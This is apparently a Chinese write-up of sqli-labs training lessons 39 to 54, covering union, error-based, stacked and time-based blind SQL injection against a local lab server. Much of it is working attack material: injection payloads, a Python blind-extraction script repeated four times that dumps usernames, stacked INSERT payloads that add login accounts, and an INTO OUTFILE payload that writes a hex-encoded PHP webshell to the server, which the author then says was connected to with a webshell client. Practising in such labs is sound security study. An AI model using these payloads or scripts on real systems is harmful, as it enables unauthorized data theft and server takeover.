【靶场练习_sqli-labs】SQLi-LABS Page-3 (Stacked Injections)
Less-39:
?id=1 and 1 ,?id=1 and 1 : 回显不同,数字型
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
Less-40:
?id=1' and '0 , ?id=1' and '0 :回显不同 ,单引号闭合
?id=2' and '1 : 回显第一条数据,小括号闭合
?id=2') order by 3--+ ,?id=2') order by 4--+ :回显不同==》3列
?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
Less-41:
?id=2 and 1 :回显第二条的数据 ,无小括号
?id=1 and 0 ,?id=1 and 0 :数字型
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
Less-42:
这里要补一个知识点:堆叠注入
注入原理
平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。但堆叠注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这个时候我们使用增删查改毫无限制。
使用条件
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。
SQL INSERT INTO 语法
INSERT INTO 语句可以有两种编写形式。
第一种形式无需指定要插入数据的列名,只需提供被插入的值即可:
INSERT INTO table_name
VALUES (value1,value2,value3,...);第二种形式需要指定列名及被插入的值:
INSERT INTO table_name (column1,column2,column3,...)
VALUES (value1,value2,value3,...);
NOTE1:这里的login_user有过滤,无法注入。
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
NOTE2:插入的id要写大一点,id无法覆盖。
Less-43:
login_user=1--+&login_password=admin'--+&mysubmit=Login : 单引号闭合
这里有两个注入点,两个都要试一遍,最后发现在login_password里出现了报错
根据报错看出有小括号闭合:
可以进行数据的插入:login_user=1--+&login_password=admin');insert into users values(23,'bbbbbb','123456')--+&mysubmit=Login
login_user=bbbbbb&login_password=123456&mysubmit=Login : 成功登陆
Less-44:
弱口令过了,原理就是,不断地构造,猜测。。。
where username="$login_user" : 1" or "1
where username=("$login_user") : 1") or ("1
where username='$login_user' : 1' or '1
where username=('$login_user') : 1') or ('1
where username= $login_user : 1 or 1
login_user=1' or '1&login_password=1' or '1&mysubmit=Login
这里一份其他做法,用的是sql语句,记录一下:
username:admin
password:aaa';create table hps like users#
create table like:
说明:复制表结构和索引(但不包括表内的具体内容)
用法:create table user2 like user1create table as:
说明:复制表结构和数据(但不包括索引)
用法:
create table user2 as select * from user1;
create table user2 as select * from user1 limit 0;
其中,limit 0表示只复制表结构,不复制数据。
原文链接:https://blog.csdn.net/stpeace/article/details/87857903
Less-45:
老配方直接暴力来 : login_user=1') or ('1&login_password=1') or ('1&mysubmit=Login
Less-46:
<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp); $sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
if ($result)
{ while ($row = mysql_fetch_assoc($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['username']."</td>";
echo "<td>".$row['password']."</td>";
echo "</tr>";
echo "</font>";
}
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input parameter as SORT with numeric value<br><br><br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-46.jpg" /><br>';
echo "Lesson Concept and code Idea by <b>D4rk</b>";
}
?>
整理好后的源码
这里的sort=num,是指按照num列排序:
?sort=2 and 1--+,回显的是按照第一列排序的结果,证明后台为数字型,然后尝试各种注入,最后报错注入成功了:
?sort=(select 1 from (select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a) b)--+ :查库
?sort=(SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) :查数据,用上面哪种报错法无法查表,老是显示回显多于一列,即使用了limit也没用,这个时候就可以用name_const()这种类型。
?sort=extractvalue(0x0a,concat(0x0a,(select database()))) : 在我的环境里不知道为什么始终用不了函数报错,但是也是可以勉勉强强的查个数据库:
这里贴一位师傅的博客,他这题讲的很详细:https://www.cnblogs.com/-zhong/p/10968532.html
Less-47:
?sort=1' and '1,?sort=1' and '0 :回显不同,单引号闭合
?sort=2') and('1 :报错,无小括号
?sort=' and (select 1 from (select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a) b)--+ : 查库
?sort=' and (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) --+ : 查表中数据
Less-48:
猜测结构:只有1 and 1有回显,证明为数字型【使用的时候记得该最后的1为0,这其实是8条语句,四种类型,每种两个对比着看】
1 and 1
1' and '1
1" and "1
1) and (1
1") and ("1
1') and ('1
<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp); $sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
if ($result)
{ while ($row = mysql_fetch_assoc($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['username']."</td>";
echo "<td>".$row['password']."</td>";
echo "</tr>";
echo "</font>";
}
echo "</table>"; }
}
else
{
echo "Please input parameter as SORT with numeric value<br><br>< br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-47.jpg" /><br>';
echo "Lesson Concept and code Idea by <b>D4rk</b>";
}
?>a
源码整理后的
报错注入失败,无错误回显:
?sort=1 and if((length(database())=8),sleep(3),1) --+ :时间注入成功了,其中这里延时了45s(一共15条数据,每一条延时3s):
这里我的sleep(0.2),一共15条数据,就会延时3s,不然太爆破长了:
'''
@Modify Time @Author
------------ -------
2019/10/9 10:57 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.43.116/sqli-labs-master/Less-48/?sort=1 "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(0.2)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(0.2)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() # 8
# database_name(8) #security
# table_length('security')#security 中的所有数据表名长: 43
# table_name(43, 'security')#所有的数据表名: emails@hps@referers@test@uagents@user@users
# column_length('users','security') #users 中的所有字段名长: 20
# column_name(20,'users','security')#所有的字段名: id@username@password
# data_length('username', 'users')#117
data_detail(117, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4@aaaaaaaaaaaaaaaaaa@bbbbbb
盲注脚本
Less-49:这一次的注入在两边用单引号包裹起来了
找资料的时候发现一篇很好的博客:《Mysql order by 注入总结》
<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp); $sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result)
{
?>
<center>
<font color= "#00FF00" size="4"> <table border='1'>
<tr>
<th> ID </th>
<th> USERNAME </th>
<th> PASSWORD </th>
</tr>
</font>
</font>
<?php
while ($row = mysql_fetch_assoc($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>".$row['id']."</td>";
echo "<td>".$row['username']."</td>";
echo "<td>".$row['password']."</td>";
echo "</tr>";
echo "</font>";
}
echo "</table>"; }
}
else
{
echo "Please input parameter as SORT with numeric value<br><br><br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-47.jpg" /><br>';
echo "Lesson Concept and code by <b>D4rk</b>";
}
?>
页面源码整理后的
?sort=1' and if((length(database())=8),sleep(3),1) --+ : 判断时间注入 ,然后走48的脚本
这里要贴另一种方法:into outfile注入 +《那些强悍的PHP一句话后门》
SELECT INTO…OUTFILE语句把表数据导出到一个文本文件中,并用LOAD DATA …INFILE语句恢复数据。但是这种方法只能导出或导入数据的内容,不包括表的结构,如果表的结构文件损坏,则必须先恢复原来的表的结构。
SELECT INTO…OUTFILE语法:
select * from Table into outfile '/路径/文件名' fields terminated by ',' enclosed by '"' lines terminated by '\r\n'
(1)路径目录必须有读写权限777
(2)文件名必须唯一
(3)fields terminated by ','必须存在,否则打开的文件的列在同一的单元格中出现
(4)我验证的表结构为gbk的,否则出现乱码● fields子句:在FIELDS子句中有三个亚子句:TERMINATED BY、 [OPTIONALLY] ENCLOSED BY和ESCAPED BY。如果指定了FIELDS子句,则这三个亚子句中至少要指定一个。
(1)TERMINATED BY用来指定字段值之间的符号,例如,“TERMINATED BY ','” 指定了逗号作为两个字段值之间的标志。
(2)ENCLOSED BY子句用来指定包裹文件中字符值的符号,例如,“ENCLOSED BY ' " '”表示文件中字符值放在双引号之间,若加上关键字OPTIONALLY表示所有的值都放在双引号之间。
(3)ESCAPED BY子句用来指定转义字符,例如,“ESCAPED BY '*'”将“*”指定为转义字符,取代“\”,如空格将表示为“*N”。
● LINES子句:在LINES子句中使用TERMINATED BY指定一行结束的标志,如“LINES TERMINATED BY '?'”表示一行以“?”作为结束标志。
?sort=1' into outfile "./test.php" lines terminated by 0x3c3f706870206576615f7228245f504f53545b73625d293f3e --+
这里把一句话木马hex了 ===》 把生成的一串当成分割符===》?sort=1' into outfile "./test.php" lines terminated by <?php eva_r($_POST[sb])?> --+
直接访问http://192.168.43.116/sqli-labs-master/Less-49/../../../var/lib/mysql/test.php
菜刀连接成功:
Less-50:
?sort= 1' --+ : 有报错回显,可以考虑报错注入
?sort= (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) --+ : 貌似限制了回显长度
?sort= (SELECT * FROM (SELECT name_const((select email_id from emails limit 5,1),1),name_const((select email_id from emails limit 5,1),1)) a) --+ : 用limit分割一个一个查
Less-51:
可以继续时间注入:
'''
@Modify Time @Author
------------ -------
2019/10/9 10:57 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.43.116/sqli-labs-master/Less-51/?sort=1' "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(0.2)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(0.2)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() # 8
# database_name(8) #security
# table_length('security')#security 中的所有数据表名长: 43
# table_name(43, 'security')#所有的数据表名: emails@hps@referers@test@uagents@user@users
# column_length('users','security') #users 中的所有字段名长: 20
# column_name(20,'users','security')#所有的字段名: id@username@password
# data_length('username', 'users')#117
data_detail(117, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4@aaaaaaaaaaaaaaaaaa@bbbbbb
脚本
查了一下源码,里面有这个函数 mysqli_multi_query($con1, $sql) 可以考虑堆叠注入:
<?php
include("../sql-connections/sqli-connect.php");
error_reporting(0);
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp); $sql="SELECT * FROM users ORDER BY '$id'";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{ ?>
<?php
/* store first result set */
if ($result = mysqli_store_result($con1))
{
while($row = mysqli_fetch_row($result))
{
echo '<font color= "#00FF11" size="3">';
echo "<tr>";
echo "<td>";
printf("%s", $row[0]);
echo "</td>";
echo "<td>";
printf("%s", $row[1]);
echo "</td>";
echo "<td>";
printf("%s", $row[2]);
echo "</td>";
echo "</tr>";
echo "</font>"; } }
echo "</table>";
} else
{
echo '<font color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
else
{
echo "Please input parameter as SORT with numeric value<br><br><br><br>";
echo "<br><br><br>";
echo '<img src="../images/Less-51.jpg" /><br>';
}
?>
?sort=-1' into outfile "./test51.php" lines terminated by 0x3c3f706870206576615f7228245f504f53545b73625d293f3e --+ :
然后就是老套路了:
Less-52:
加入',)," 都没回显 ,但是可以考虑时间盲注:
'''
@Modify Time @Author
------------ -------
2019/10/9 10:57 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.43.116/sqli-labs-master/Less-52/?sort=1 "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(0.2)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.2)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(0.2)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(0.2)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() # 8
# database_name(8) #security
# table_length('security')#security 中的所有数据表名长: 43
# table_name(43, 'security')#所有的数据表名: emails@hps@referers@test@uagents@user@users
# column_length('users','security') #users 中的所有字段名长: 20
# column_name(20,'users','security')#所有的字段名: id@username@password
# data_length('username', 'users')#117
data_detail(117, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4@aaaaaaaaaaaaaaaaaa@bbbbbb
看了其他师傅的做法,他们用堆叠注入直接插入数据:
?sort=1;insert into users values(1234,'chrysanthemum','********')--+
中文的话好像回显有问题:
Less-54:
?sort=0 , 正常回显应是字符型
?sort=1' and sleep(1)--+ : 可以继续时间盲注
'''
@Modify Time @Author
------------ -------
2019/10/9 10:57 laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time url = "http://192.168.43.116/sqli-labs-master/Less-53/?sort=1' "
def database_length():
global url
for i in range(1,10000):
sql = url + " and if((length(database()))>"+str(i)+",0,sleep(0.5)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
print(sql)
if(e_time-s_time) > 3:
print("数据库长:",i)
break
def database_name(database_length):
global url
sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(0.5)) +--+"
db_name = ''
for num in range(1, database_length+1):
for asc in range(ord('a'), ord('z') + 1):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
db_name += chr(asc)
print("数据库名:",db_name)
break
def table_length(database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.5)) +--+"
s_time = time.time()
response = requests.get(url=sql)
e_time = time.time()
print(sql)
if (e_time - s_time) > 3:
print(database_name,"中的所有数据表名长:", i)
break
def table_name(table_length,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.5)) +--+"
table_name = ''
for num in range(1, table_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的数据表名:", table_name)
break
def column_length(table_name,database_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(0.5)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(table_name, "中的所有字段名长:", i)
break
def column_name(column_length,table_name,database_name):
global url
sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(0.5)) +--+"
table_name = ''
for num in range(1, column_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
table_name += chr(asc)
print("所有的字段名:", table_name)
break
def data_length(column_name,table_name):
global url
for i in range(1, 10000):
sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(0.5)) +--+"
s_time = time.time()
requests.get(url=sql)
e_time = time.time()
# print(sql)
if (e_time - s_time) > 3:
print(column_name, "字段的值长:", i)
break
def data_detail(data_length,column_name,table_name):
global url
sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(0.5)) +--+"
data = ''
for num in range(1, data_length + 1):
for asc in range(32, 128):
s_time = time.time()
requests.get(sql.format(num=num, asc=asc))
e_time = time.time()
if (e_time - s_time) > 3:
data += chr(asc)
print(column_name,"字段的值:", data)
break
if __name__ == '__main__':
# database_length() # 8
# database_name(8) #security
# table_length('security')#security 中的所有数据表名长: 29
# table_name(29, 'security')#所有的数据表名: emails@hps@referers@test@uagents@user@users
# column_length('users','security') #users 中的所有字段名长: 20
# column_name(20,'users','security')#所有的字段名: id@username@password
# data_length('username', 'users')#98
# data_detail(98, 'username', 'users')#username 字段的值: Dumb@Angelina@Dummy@secure@stupi……
也可以继续用堆叠注入:?sort=1' ;insert into users values(123,'laolao','456')--+
【靶场练习_sqli-labs】SQLi-LABS Page-3 (Stacked Injections)的更多相关文章
- Sqli labs系列-less-1 详细篇
要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...
- Sqli labs系列-less-2 详细篇
就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- SQL注入系列:SQLi Labs
前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...
- SQLI LABS Challenges Part(54-65) WriteUp
终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...
- SQLI LABS Stacked Part(38-53) WriteUp
这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...
- SQLI LABS Advanced Part(23-37) WriteUp
继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...
- Sqli labs系列-less-5&6 报错注入法(下)
我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...
随机推荐
- 测开之路六十:接口测试平台之common目录
实现接口测试平台使用jsonpath进行取值来断言,效果: 访问页面: 调试功能:http://www.kuaidi100.com/query 保存功能 触发执行功能 查看报告功能 目录结构 comm ...
- 让dcef3支持mp3和h.264 mp4解码播放
嵌入式Chromium框架(简称CEF) 是一个由Marshall Greenblatt在2008建立的开源项目,它主要目的是开发一个基于Google Chromium的Webbrowser控件.CE ...
- hdu6575Budget
Problem Description Avin’s company has many ongoing projects with different budgets. His company rec ...
- DbWrench001--简介
DbWrench--简介 mac下载地址:http://www.dbwrench.com/ DbWrench 工具等价于powerdesigner 均为数据库原型设计工具 DbWrench 详细介绍 ...
- 使用Docker部署爬虫管理平台Crawlab
当前目录创建 docker-compose.yml 文件 version: '3.3' services: master: image: tikazyq/crawlab:latest containe ...
- 最小生成树(prim和Kruskal操!!SB题)
Arctic Network Time Limit: 2000MS Memory Limit: 65536K Total Submissions: 30571 Accepted: 9220 D ...
- bzoj1779 [Usaco2010 Hol]Cowwar 奶牛战争(网络流)
1779: [Usaco2010 Hol]Cowwar 奶牛战争 Time Limit: 10 Sec Memory Limit: 64 MBSubmit: 302 Solved: 131[Sub ...
- mint/ubuntu Android Eclipse ADT 简单安装及执行崩溃解决的方法
1. 下载 Android SDK(ADT Bundle) http://developer.android.com/sdk/index.html (站点訪问不了或者慢.请參考:轻松改 ...
- hud2243 考研路茫茫——单词情结
